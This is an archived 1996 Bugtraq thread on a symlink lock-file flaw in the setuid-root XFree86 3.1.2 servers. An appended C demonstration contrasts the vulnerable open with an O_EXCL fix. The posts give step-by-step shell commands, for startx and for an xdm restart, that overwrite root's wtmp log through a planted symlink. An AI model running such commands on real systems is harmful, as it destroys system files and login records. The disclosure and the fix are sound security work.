Bugtraq mailing list archives

Re: XFree86 3.1.2 Security Problems


From: frantic () worldnet net (Anthony C. Zboralski)
Date: Tue, 30 Jan 1996 02:51:40 +0100


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 29 Jan 1996, David J Meltzer wrote:

Date: Mon, 29 Jan 1996 00:16:46 -0500
From: David J Meltzer <davem+ () andrew cmu edu>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ () CRIMELAB COM>
Subject: XFree86 3.1.2 Security Problems

   There are security holes in XFree86 3.1.2, which installs its servers
as suid root (/usr/X11R6/bin/XF86_*).  When reading and writing files,
it does not take proper precautions to ensure that file permissions are
maintained, resulting in the ability to overwrite files, and to read
limited portions of other files.
   The first problem stems from the server opening a temporary file,
/tmp/.tX0-lock with mode (O_WRONLY|O_CREAT|O_TRUNC).  By making this
file a symlink, the server will overwrite the original file, and then
write to it its current pid.
   Other problems exist in the server relating to similar problems, one
such example is the ability to specify an arbitrary file for the XF86config
file which will then be opened, and the first line that fails to match
the expected format will be output with an error, allowing a line to be
read from an arbitrary file.

                   Program: XFree86 3.1.2 servers
Affected Operating Systems: All systems with XFree86 3.1.2 installed
              Requirements: account on system
           Temporary Patch: chmod o-x /usr/X11R6/bin/XF86*
       Security Compromise: overwrite arbitrary files
                    Author: Dave M. (davem () cmu edu)
                  Synopsis: While running suid root, XFree86 servers do
                            not properly check file permissions, allowing
                            a user to overwrite arbitrary files on a
                            system.


Exploit:
$ ls -l /var/adm/wtmp
-rw-r--r--   1 root     root       174104 Dec 30 08:31 /var/adm/wtmp
$ ln -s /var/adm/wtmp /tmp/.tX0-lock
$ startx
(At this point exit X if it started, or else ignore any error messages)
$ ls -l /var/adm/wtmp
-r--r--r--   1 root     root           11 Dec 30 08:33 /var/adm/wtmp



Oh well, if xdm is running, the temporary patch won't do you any good...
Xdm manages a collection of X displays, which may be on the local host
or remote servers. Xdm provides services similar to those provided by
init, getty and login on character terminals: prompting for login
name and password, authenticating the user, and running a "session."

Xdm is launched by root.. by default it will start a server on the local
display. If the server crashes for some reason, gets killed, or if the user
sends a server abort sequence, it will restart the server..

$ ps -ax | grep xdm
   80  ?  S     0:00 xdm
  142  ?  S     0:01 /usr/X11R6/bin/X -auth /usr/X11R6/lib/X11/xdm/A:0-a00080
  179 v03 D     0:00 grep xdm
$ ls -l /var/log/wtmp
-rw-r--r--   1 root     root        31864 Jan 30 02:13 /var/log/wtmp
$ ln -s /var/log/wtmp /tmp/.tX0-lock

Now, you switch to the local X display and
send the <Ctrl><Alt><BS> server abort sequence..
Wait until xdm pops up a new server process..
then switch back to the shell:

$ ls -l /var/log/wtmp
-rw-r--r--   1 root     root           11 Jan 30 02:13 /var/log/wtmp

Xdm doesn't need to kill the server when a user logs out, so the only worry
would be the sending of the abort sequence, easily fixed by uncommenting
the "DontZap" setting in /etc/XF86Config.. but I have seen XF86 crashing
so many times for unguessable reasons that I don't think it will fix the prob.

Maybe someone could take a look at the server sources so it does a
system("/bin/rm /tmp/.tX0-lock") just before it writes to the file..
I don't have 'em handy..
____
\  /__  Anthony C. Zboralski <frantic () worldnet net>
 \/  /
   \/   Finger <frantic () webbar imaginet fr> for PGP Public Key


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv
Comment: France, Russia and Irak still forbid encryption..

iQCVAwUBMQ141V/59mQ4I551AQGVEgP/aO3+dCX8FA/2sNOeaE6p33u2+Ed1yuPM
2NyI14L3q1RQ7xt8seHQD1KzWxvRJxbSvWKhrIdhSuisAzlh8QJdn4hZ8ulgPNBf
uesUvAbvVJjhhandT0wjVbL0rYRBJEs9NJtWTrrF/gZ+5+cuvnKM2iyeTcAY9EGL
2MvbAtN6yr4=
=EwzG
-----END PGP SIGNATURE-----

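
The lock-file symlink problem both messages describe, as an added example in C (an editor's demonstration; it is not XFree86 code and not code from either poster): the O_WRONLY|O_CREAT|O_TRUNC open the advisory names, next to the same write done with O_CREAT|O_EXCL, each pointed at a symlink planted the way the `ln -s` steps above plant it. Everything it touches is constructed for the demo: a scratch directory instead of /tmp and /var/adm, a stand-in file for wtmp, the pid 4242, and an assumed 10-wide pid format chosen because it yields the 11 bytes the `ls -l` listings show after the overwrite.

```c
/* Added example: lock-file open pattern from the XFree86 3.1.2 advisory
 * beside a hardened one, run against an attacker-planted symlink.
 * Not XFree86 code; all paths and contents below are constructed. */
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Constructed stand-in for /var/adm/wtmp (174104 bytes in the advisory). */
const char *const DEMO_PAYLOAD = "constructed wtmp contents standing in for the real log\n";

/* Pid as a 10-wide field plus newline: 11 bytes, the size both ls listings
 * show after the overwrite.  The format itself is an assumption. */
static int write_pid_line(int fd, long pid)
{
    char buf[32];
    int n = snprintf(buf, sizeof buf, "%10ld\n", pid);
    return (write(fd, buf, (size_t)n) == (ssize_t)n) ? 0 : -1;
}

/* The 3.1.2 pattern: O_TRUNC through whatever lockpath names.  If lockpath is
 * a symlink to wtmp, wtmp is truncated and receives the pid.  0 on success. */
int lock_write_pid_vulnerable(const char *lockpath, long pid)
{
    int fd = open(lockpath, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0)
        return -1;
    int rc = write_pid_line(fd, pid);
    close(fd);
    return rc;
}

/* Hardened: O_CREAT|O_EXCL fails with EEXIST when anything already sits at
 * lockpath, a symlink included (POSIX requires this whatever the link points
 * at), so a planted link is never written through.  O_NOFOLLOW, where the
 * platform defines it, additionally refuses a symlink at the final component.
 * Removing the file first is no fix: the link can be re-planted between the
 * rm and the open. */
int lock_write_pid_safe(const char *lockpath, long pid)
{
    int flags = O_WRONLY | O_CREAT | O_EXCL;
#ifdef O_NOFOLLOW
    flags |= O_NOFOLLOW;
#endif
    int fd = open(lockpath, flags, 0644);
    if (fd < 0)
        return -1;   /* EEXIST: stale lock or planted link; the caller decides */
    int rc = write_pid_line(fd, pid);
    close(fd);
    return rc;
}

/* Plant "ln -s wtmp .tX0-lock" in a scratch directory, run the given writer
 * as the server would, and return the victim's size afterwards (-1 on setup
 * error).  *writer_rc receives the writer's own return value. */
long run_symlink_demo(int (*writer)(const char *, long), int *writer_rc)
{
    char dir[128], victim[256], lock[256];
    struct stat st;
    size_t len = strlen(DEMO_PAYLOAD);

    snprintf(dir, sizeof dir, "/tmp/xlockdemo.%ld", (long)getpid());
    if (mkdir(dir, 0700) < 0 && errno != EEXIST) {
        snprintf(dir, sizeof dir, "./xlockdemo.%ld", (long)getpid()); /* no /tmp */
        if (mkdir(dir, 0700) < 0 && errno != EEXIST)
            return -1;
    }
    snprintf(victim, sizeof victim, "%s/wtmp", dir);
    snprintf(lock, sizeof lock, "%s/.tX0-lock", dir);

    /* the victim, as root's wtmp would look before the attack */
    int fd = open(victim, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0 || write(fd, DEMO_PAYLOAD, len) != (ssize_t)len)
        return -1;
    close(fd);

    /* attacker step: the symlink takes the lock file's name */
    unlink(lock);
    if (symlink(victim, lock) < 0)
        return -1;

    /* "suid server" step */
    *writer_rc = writer(lock, 4242);

    if (stat(victim, &st) < 0)
        return -1;
    unlink(lock);
    unlink(victim);
    rmdir(dir);
    return (long)st.st_size;
}

int main(void)
{
    int rc;
    long size = run_symlink_demo(lock_write_pid_vulnerable, &rc);
    printf("O_TRUNC writer: rc=%d, victim now %ld bytes\n", rc, size);
    size = run_symlink_demo(lock_write_pid_safe, &rc);
    printf("O_EXCL writer:  rc=%d, victim still %ld bytes\n", rc, size);
    return 0;
}
```

Built with `cc -o xlockdemo xlockdemo.c` and run as an ordinary user, the first writer leaves the victim at 11 bytes (the same size as the overwritten wtmp in both listings) while the second returns -1 with errno EEXIST and the victim untouched. The refusal happens inside the kernel's open(), so there is no window for the attacker to re-plant the link; what remains for a real server is deciding what to do with an EEXIST that comes from a genuinely stale lock rather than an attack, which is a separate question from the one the advisory raises.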